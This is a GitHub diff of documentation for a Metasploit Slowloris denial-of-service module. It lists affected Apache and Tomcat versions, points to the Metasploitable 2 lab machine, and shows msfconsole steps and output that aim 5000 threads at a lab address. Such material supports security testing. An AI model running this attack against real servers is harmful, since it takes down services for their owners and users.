You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
This module tries to keep many connections to the target web server open and hold them open as long as possible.
4
+
5
+
Vulnerable app versions include:
6
+
7
+
- Apache HTTP Server 1.x and 2.x
8
+
- Apache Tomcat 5.5.0 through 5.5.29, 6.0.0 through 6.0.27 and 7.0.0 beta
9
+
10
+
Download the Metasploitable 2 vulnerable Linux virtual machine from [https://sourceforge.net/projects/metasploitable/files/Metasploitable2/](https://sourceforge.net/projects/metasploitable/files/Metasploitable2/).
11
+
12
+
Verification Steps
13
+
14
+
1. Start msfconsole
15
+
2. Do: use auxiliary/dos/http/slow_loris
16
+
3. Do: set RHOST
17
+
4. Do: run
18
+
5. Visit server URL in your web-browser.
19
+
20
+
Scenarios
21
+
22
+
Apache/2.2.8 - Ubuntu 8.04
23
+
24
+
```
25
+
msf > use auxiliary/dos/http/slow_loris.rb
26
+
msf auxiliary(slow_loris) > show options
27
+
28
+
Module options (auxiliary/dos/http/slow_loris):
29
+
30
+
Name Current Setting Required Description
31
+
---- --------------- -------- -----------
32
+
RHOST 192.168.216.129 yes The target address
33
+
RPORT 80 yes The target port (TCP)
34
+
THREADS 5000 yes The number of concurrent threads
35
+
TIMEOUT 60 yes The maximum time in seconds to wait for each request to finish
36
+
37
+
msf auxiliary(slow_loris) > set RHOST 192.168.216.129
0 commit comments